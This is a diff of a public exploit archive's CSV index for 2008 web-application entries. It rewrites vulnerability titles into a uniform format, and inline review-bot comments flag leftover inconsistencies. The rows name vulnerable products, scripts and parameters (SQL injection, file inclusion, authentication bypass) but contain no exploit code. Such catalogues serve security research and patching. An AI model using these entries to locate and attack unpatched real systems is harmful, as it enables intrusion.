+6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php' SQL Injection",2008-09-21,"Hussin X",php,webapps,0
 6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin",2008-09-22,"CWH Underground",php,webapps,0
 6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0
 6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - 'comments.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0
@@ -19606,7 +19609,7 @@ id,file,description,date,author,platform,type,port
 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0
 6676,platforms/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0
 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) SQL Injection",2008-10-05,Piker,php,webapps,0
-6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0
+6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,php,webapps,0
 6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps,0
 6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,php,webapps,0
 6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
@@ -19647,7 +19650,7 @@ id,file,description,date,author,platform,type,port
 6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - (redirect.php) Privilege Escalation",2008-10-10,StAkeR,php,webapps,0
 6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection",2008-10-11,H!tm@N,php,webapps,0
 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection",2008-10-11,Hakxer,asp,webapps,0
-6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - (File Disclosure/Code Execution) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0
+6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - File Disclosure / Code Execution",2008-10-12,muuratsalo,php,webapps,0
 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure",2008-10-12,GoLd_M,php,webapps,0
 6735,platforms/php/webapps/6735.php,"Globsy 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
 6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'index.php cat' SQL Injection",2008-10-12,Hakxer,php,webapps,0
@@ -19710,13 +19713,13 @@ id,file,description,date,author,platform,type,port
 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0
 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin",2008-10-23,"CWH Underground",php,webapps,0
 6821,platforms/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,php,webapps,0
-6822,platforms/php/webapps/6822.txt,"websvn 2.0 - (Cross-Site Scripting / File Handling/Code Execution) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0
+6822,platforms/php/webapps/6822.txt,"websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps,0
 6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0
 6826,platforms/php/webapps/6826.txt,"Joomla! Component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0
 6827,platforms/php/webapps/6827.txt,"Joomla! Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0
 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0
 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0
-6833,platforms/php/webapps/6833.txt,"phpdaily - (SQL Injection / Cross-Site Scripting / lfd) Multiple Vulnerabilities",2008-10-24,0xFFFFFF,php,webapps,0
+6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0
 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0
 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0
 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0
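Review bot: Row 6833 expands the old `lfd` to `Local File Download`, a term no other row visible in this diff uses; the surrounding rows say `File Disclosure` (6835 in this hunk, 6972 further down). Unless platforms/php/webapps/6833.txt itself says "download", `"phpdaily - SQL Injection / Cross-Site Scripting / Local File Disclosure"` would keep the vocabulary consistent for anyone filtering the index by vulnerability class.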
@@ -19731,7 +19734,7 @@ id,file,description,date,author,platform,type,port
 6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,php,webapps,0
 6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0
 6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - (category_id) Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0
-6853,platforms/php/webapps/6853.txt,"questcms - (Cross-Site Scripting / Directory Traversal / SQL Injection) Multiple Vulnerabilities",2008-10-27,d3b4g,php,webapps,0
+6853,platforms/php/webapps/6853.txt,"questcms - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps,0
 6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps,0
 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0
 6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - SQL Injection",2008-10-28,ZoRLu,php,webapps,0
@@ -19833,10 +19836,10 @@ id,file,description,date,author,platform,type,port
 6967,platforms/php/webapps/6967.txt,"MatPo Link 1.2b - (view.php id) SQL Injection",2008-11-03,ZoRLu,php,webapps,0
 6968,platforms/php/webapps/6968.txt,"Acc Autos 4.0 - Insecure Cookie Handling",2008-11-03,x0r,php,webapps,0
 6969,platforms/php/webapps/6969.txt,"Apoll 0.7b - (Authentication Bypass) SQL Injection",2008-11-03,ZoRLu,php,webapps,0
-6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-03,Hakxer,php,webapps,0
+6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting",2008-11-03,Hakxer,php,webapps,0
 6972,platforms/php/webapps/6972.txt,"pppBlog 0.3.11 - (randompic.php) File Disclosure",2008-11-03,JosS,php,webapps,0
 6973,platforms/php/webapps/6973.txt,"TBmnetCMS 1.0 - (index.php content) Local File Inclusion",2008-11-04,d3v1l,php,webapps,0
-6974,platforms/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-04,G4N0K,php,webapps,0
+6974,platforms/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 - SQL Injection / Cross-Site Scripting",2008-11-04,G4N0K,php,webapps,0
 6975,platforms/php/webapps/6975.txt,"Joomla! Component VirtueMart Google Base 1.1 - Remote File Inclusion",2008-11-04,NoGe,php,webapps,0
 6976,platforms/php/webapps/6976.txt,"Joomla! Component ongumatimesheet20 4b - Remote File Inclusion",2008-11-04,NoGe,php,webapps,0
 6977,platforms/php/webapps/6977.txt,"WEBBDOMAIN Post Card 1.02 - 'catid' SQL Injection",2008-11-04,"Hussin X",php,webapps,0
@@ -19887,7 +19890,7 @@ id,file,description,date,author,platform,type,port
 7024,platforms/php/webapps/7024.txt,"DELTAScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0
 7025,platforms/php/webapps/7025.txt,"DELTAScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0
 7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - (ctg) SQL Injection",2008-11-06,"Hussin X",php,webapps,0
-7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0
+7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory - Cross-Site Scripting / SQL Injection",2008-11-06,G4N0K,php,webapps,0
 7028,platforms/php/webapps/7028.txt,"TurnkeyForms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,php,webapps,0
 7029,platforms/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection",2008-11-07,G4N0K,php,webapps,0
 7030,platforms/php/webapps/7030.txt,"Mole Group Pizza - (manufacturers_id) Script SQL Injection",2008-11-07,InjEctOr5,php,webapps,0
@@ -19895,7 +19898,7 @@ id,file,description,date,author,platform,type,port
 7032,platforms/php/webapps/7032.txt,"U&M Software Signup 1.1 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0
 7033,platforms/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0
 7034,platforms/php/webapps/7034.txt,"U&M Software Event Lister 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0
-7035,platforms/php/webapps/7035.txt,"TurnkeyForms Local Classifieds - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-07,TR-ShaRk,php,webapps,0
+7035,platforms/php/webapps/7035.txt,"TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0
 7038,platforms/php/webapps/7038.txt,"Joomla! Component ClickHeat 1.0.1 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0
 7039,platforms/php/webapps/7039.txt,"Joomla! Component Recly!Competitions 1.0.0 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0
 7040,platforms/php/webapps/7040.txt,"Joomla! Component Feederator 1.0.5 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0
@@ -19912,7 +19915,7 @@ id,file,description,date,author,platform,type,port
 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0
 7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection",2008-11-07,G4N0K,php,webapps,0
 7057,platforms/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution",2008-11-08,Ams,php,webapps,0
-7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0
+7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting",2008-11-08,ZoRLu,php,webapps,0
 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0
 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0
 7062,platforms/php/webapps/7062.txt,"Zeeways ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0
@@ -19927,8 +19930,8 @@ id,file,description,date,author,platform,type,port
 7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final - (Authentication Bypass) SQL Injection",2008-11-09,Cyber-Zone,php,webapps,0
 7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection",2008-11-09,"Hussin X",php,webapps,0
 7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps,0
-7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0
-7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0
+7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-11-09,"Andreas Kurtz",jsp,webapps,0
+7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload",2008-11-10,USH,php,webapps,0
 7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - 'Tipo' Parameter Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0
 7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - 'PostID' Parameter SQL Injection",2008-11-10,boom3rang,php,webapps,0
 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0
@@ -20021,25 +20024,25 @@ id,file,description,date,author,platform,type,port
 7200,platforms/php/webapps/7200.txt,"PG Real Estate - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0
 7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0
 7202,platforms/php/webapps/7202.txt,"PG Job Site - (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0
-7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0
+7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0
 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0
 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0
 7208,platforms/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - (ad_id) SQL Injection",2008-11-24,"Hussin X",php,webapps,0
 7210,platforms/php/webapps/7210.txt,"Goople CMS 1.7 - Arbitrary Code Execution",2008-11-24,x0r,php,webapps,0
 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0
 7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0
-7214,platforms/php/webapps/7214.txt,"ftpzik - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-11-24,JIKO,php,webapps,0
-7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-24,ZoRLu,php,webapps,0
+7214,platforms/php/webapps/7214.txt,"ftpzik - Cross-Site Scripting / Local File Inclusion",2008-11-24,JIKO,php,webapps,0
+7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0
 7216,platforms/php/webapps/7216.txt,"WebStudio CMS - 'index.php pageid' Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0
 7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,php,webapps,0
-7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-11-24,Osirys,php,webapps,0
+7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0
 7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusion",2008-11-24,NoGe,php,webapps,0
 7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
 7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
 7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - (categorie.php cat_id) SQL Injection",2008-11-25,cOndemned,php,webapps,0
 7225,platforms/php/webapps/7225.txt,"Pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
-7227,platforms/php/webapps/7227.txt,"chipmunk topsites - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0
-7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0
+7227,platforms/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0
+7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0
 7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
 7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0
 7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0
@@ -20055,7 +20058,7 @@ id,file,description,date,author,platform,type,port
 7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
 7242,platforms/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0
 7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,php,webapps,0
-7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - (SQL Injection / Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities",2008-11-27,Pouya_Server,php,webapps,0
+7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure",2008-11-27,Pouya_Server,php,webapps,0
 7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
 7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
 7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
@@ -20068,7 +20071,7 @@ id,file,description,date,author,platform,type,port
 7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0
 7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - 'id' SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0
 7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,php,webapps,0
-7259,platforms/asp/webapps/7259.txt,"comersus asp shopping cart - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,asp,webapps,0
+7259,platforms/asp/webapps/7259.txt,"Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting",2008-11-27,Bl@ckbe@rD,asp,webapps,0
 7260,platforms/php/webapps/7260.txt,"Basic-CMS - 'acm2000.mdb' Remote Database Disclosure",2008-11-28,Stack,php,webapps,0
 7261,platforms/php/webapps/7261.txt,"Basic-CMS - 'index.php id' Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0
@@ -20109,7 +20112,7 @@ id,file,description,date,author,platform,type,port
 7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 - (qtv.mdb) Database Disclosure",2008-11-30,Cyber-Zone,php,webapps,0
 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0
 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0
-7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL Injection / Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0
+7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass",2008-11-30,NoGe,php,webapps,0
 7308,platforms/php/webapps/7308.txt,"CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0
 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0
 7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0
@@ -20131,9 +20134,9 @@ id,file,description,date,author,platform,type,port
 7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS - (Authentication Bypass) SQL Injection",2008-12-03,b3hz4d,php,webapps,0
 7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion",2008-12-03,NoGe,php,webapps,0
 7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0
-7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-04,"CWH Underground",php,webapps,0
+7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",php,webapps,0
 7338,platforms/php/webapps/7338.txt,"User Engine Lite ASP - 'users.mdb' Database Disclosure",2008-12-04,AlpHaNiX,php,webapps,0
-7339,platforms/php/webapps/7339.txt,"template creature - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-04,ZoRLu,php,webapps,0
+7339,platforms/php/webapps/7339.txt,"template creature - SQL Injection / File Disclosure",2008-12-04,ZoRLu,php,webapps,0
 7340,platforms/asp/webapps/7340.txt,"Easy News Content Management - 'News.mdb' Database Disclosure",2008-12-04,BeyazKurt,asp,webapps,0
 7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion",2008-12-04,NoGe,php,webapps,0
 7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 - (index.php action) Local File Inclusion",2008-12-04,cOndemned,php,webapps,0
@@ -20141,14 +20144,14 @@ id,file,description,date,author,platform,type,port
 7344,platforms/php/webapps/7344.txt,"Gravity GTD 0.4.5 - (rpc.php objectname) Local File Inclusion / Remote Code Execution",2008-12-04,dun,php,webapps,0
 7345,platforms/php/webapps/7345.txt,"BNCwi 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps,0
 7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 - 'id' SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0
-7348,platforms/asp/webapps/7348.txt,"merlix educate servert - (Authentication Bypass/File Disclosure) Multiple Vulnerabilities",2008-12-05,ZoRLu,asp,webapps,0
+7348,platforms/asp/webapps/7348.txt,"merlix educate servert - Authentication Bypass / File Disclosure",2008-12-05,ZoRLu,asp,webapps,0
 7349,platforms/asp/webapps/7349.txt,"RankEm - 'rankup.asp siteID' SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0
 7350,platforms/asp/webapps/7350.txt,"RankEm - (Authentication Bypass) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0
-7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,php,webapps,0
+7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure",2008-12-05,AlpHaNiX,php,webapps,0
 7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - (File Disclosure/Bypass) Multiple Remote Vulnerabilities",2008-12-05,ZoRLu,php,webapps,0
 7353,platforms/asp/webapps/7353.txt,"Cold BBS - 'cforum.mdb' Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0
 7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps,0
-7356,platforms/asp/webapps/7356.txt,"ASP AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0
+7356,platforms/asp/webapps/7356.txt,"ASP AutoDealer - SQL Injection / File Disclosure",2008-12-05,AlpHaNiX,asp,webapps,0
 7357,platforms/asp/webapps/7357.txt,"ASP PORTAL - Multiple SQL Injections",2008-12-05,AlpHaNiX,asp,webapps,0
 7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0
 7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0
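Review bot: Row 7352 in this hunk still reads `(File Disclosure/Bypass) Multiple Remote Vulnerabilities`, while its neighbours 7348, 7351 and 7356 were rewritten to the new form, so the normalisation is incomplete inside the same hunk. Following the pattern used for the other rows, it would become `"Merlix Teamworx Server - File Disclosure / Bypass"`. The new 7348 title also keeps `servert`, which looks like a typo for `server`; that should be checked against the advisory text rather than assumed. Uniform titles matter because the description column is what readers search when matching an entry to an affected product.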
@@ -20163,12 +20166,12 @@ id,file,description,date,author,platform,type,port
 7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - (Natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0
 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
 7372,platforms/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
-7373,platforms/asp/webapps/7373.txt,"aspmanage banners - (Arbitrary File Upload / File Disclosure) Multiple Vulnerabilities",2008-12-07,ZoRLu,asp,webapps,0
+7373,platforms/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,asp,webapps,0
 7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0
 7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0
 7376,platforms/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
 7377,platforms/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 - 'index.php' Directory Traversal",2008-12-07,zAx,php,webapps,0
-7378,platforms/asp/webapps/7378.txt,"asp talk - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-07,Bl@ckbe@rD,asp,webapps,0
+7378,platforms/asp/webapps/7378.txt,"asp talk - SQL Injection / Cross-Site Scripting",2008-12-07,Bl@ckbe@rD,asp,webapps,0
 7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - 'Filename' Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0
 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusion",2008-12-08,DSecRG,php,webapps,0
 7381,platforms/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0
@@ -20176,23 +20179,23 @@ id,file,description,date,author,platform,type,port
 7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site Arbitrary File Upload",2008-12-08,"Michael Brooks",php,webapps,0
